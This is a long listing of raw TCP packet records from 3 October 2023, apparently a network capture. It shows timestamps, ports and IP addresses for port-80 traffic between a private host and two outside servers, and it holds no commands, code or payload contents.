                                                                                                        Oct 3, 2023 18:02:44.392296076 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.392322063 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.392400026 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.392429113 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.392499924 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.392582893 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.392611027 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.392692089 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.392703056 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.392731905 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.392808914 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.392868996 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.392899036 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.392968893 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393016100 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393048048 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.393098116 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393168926 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393198967 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.393223047 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393321991 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393357992 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.393381119 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393516064 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393548012 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.393614054 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393687963 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393722057 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.393778086 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393851995 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.393884897 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.393918991 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394010067 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394040108 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.394088984 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394165993 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394201040 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.394234896 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394251108 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394284010 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.394346952 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394443035 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394478083 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.394535065 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394624949 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394659996 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.394711971 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394773960 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394804955 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.394830942 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394885063 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.394916058 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.394965887 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.395047903 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.395083904 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.395108938 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.442639112 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.442662001 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.442778111 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.489393950 CEST8049834172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.489412069 CEST8049834172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.489516020 CEST4983480192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:44.514467001 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.521179914 CEST4983480192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:44.560525894 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.560589075 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.560631037 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.560661077 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.560950994 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.560986996 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.663111925 CEST4983580192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:44.683351994 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.683773994 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.683792114 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.683800936 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.683832884 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.683840036 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.683856010 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.683927059 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.683969975 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.683996916 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.684103966 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.684140921 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.684176922 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.684276104 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.684345007 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.684350967 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.684431076 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.684483051 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.684653997 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.684672117 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.684714079 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.684770107 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.684827089 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.684864998 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.684889078 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.684959888 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685035944 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685044050 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.685077906 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685148001 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.685182095 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685255051 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685318947 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.685323954 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685403109 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685452938 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685461998 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.685472012 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685499907 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.685578108 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685642004 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685707092 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.685730934 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685795069 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685852051 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.685863018 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685939074 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.685982943 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.685993910 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686048031 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686110020 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686115026 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.686187983 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686225891 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686239004 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.686289072 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686351061 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686372995 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.686407089 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686467886 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.686470032 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686532974 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686572075 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.686614037 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686750889 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686762094 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686798096 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.686820030 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.686846018 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.686906099 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.726691961 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.735939980 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736069918 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736109018 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736119986 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.736201048 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736238003 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.736264944 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736321926 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736341953 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736361980 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.736443996 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736485958 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.736509085 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736567974 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736609936 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.736644030 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736741066 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736780882 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.736835957 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736906052 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.736943960 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.736968040 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737014055 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737054110 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.737072945 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737107992 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737142086 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.737166882 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737214088 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737245083 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.737265110 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737318039 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737355947 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.737365961 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737412930 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737446070 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.737464905 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737512112 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737562895 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.737618923 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737694025 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737730980 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.737786055 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737849951 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737884045 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.737919092 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.737982988 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.738012075 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.738037109 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.738132000 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.738164902 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.738190889 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.738251925 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.738289118 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.738312960 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.738636971 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.738679886 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.738697052 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.738778114 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.738815069 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.738817930 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.738892078 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.738930941 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.739072084 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.739172935 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.739211082 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.739219904 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.739289999 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.739305973 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.739332914 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.739494085 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.739533901 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.739533901 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.739583969 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.739620924 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.739645958 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.740039110 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.740084887 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.740134954 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.740221024 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.740259886 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.740319967 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.740392923 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.740432024 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.740494967 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.757749081 CEST8049835172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.758008957 CEST4983580192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:44.758136988 CEST4983580192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:44.758666039 CEST4983580192.168.2.3172.67.137.125
                                                                                                        Oct 3, 2023 18:02:44.789122105 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.852696896 CEST8049835172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.852972031 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.852988958 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.853030920 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.853032112 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.853262901 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.853286028 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.853305101 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.853619099 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.853665113 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.853770971 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.853903055 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.853914976 CEST8049835172.67.137.125192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.853943110 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.854099035 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.854229927 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.854266882 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.854424953 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.854495049 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.854547024 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.854562998 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.854604959 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.854643106 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.854667902 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.854810953 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.854856968 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.855453968 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.855787992 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.855833054 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.855890989 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.855942011 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.855978966 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.856029034 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.856127977 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.856175900 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.856194019 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.856213093 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.856249094 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.856275082 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.856458902 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.856503010 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.856694937 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.856786013 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.856827021 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.856837988 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.857049942 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.857091904 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.857306004 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.857371092 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.857413054 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.857439041 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.857480049 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.857511997 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.857727051 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.857893944 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.857928038 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.858027935 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.858091116 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.858122110 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.858189106 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.858268023 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.858302116 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.858338118 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.859170914 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.859213114 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.859447002 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.859611034 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.859652042 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.859688044 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.859731913 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.859762907 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.859791040 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.859877110 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.859915972 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.859929085 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.859972954 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.860004902 CEST4983380192.168.2.3193.149.185.139
                                                                                                        Oct 3, 2023 18:02:44.860030890 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.860080957 CEST8049833193.149.185.139192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.860111952 CEST4983380192.168.2.3193.149.185.139
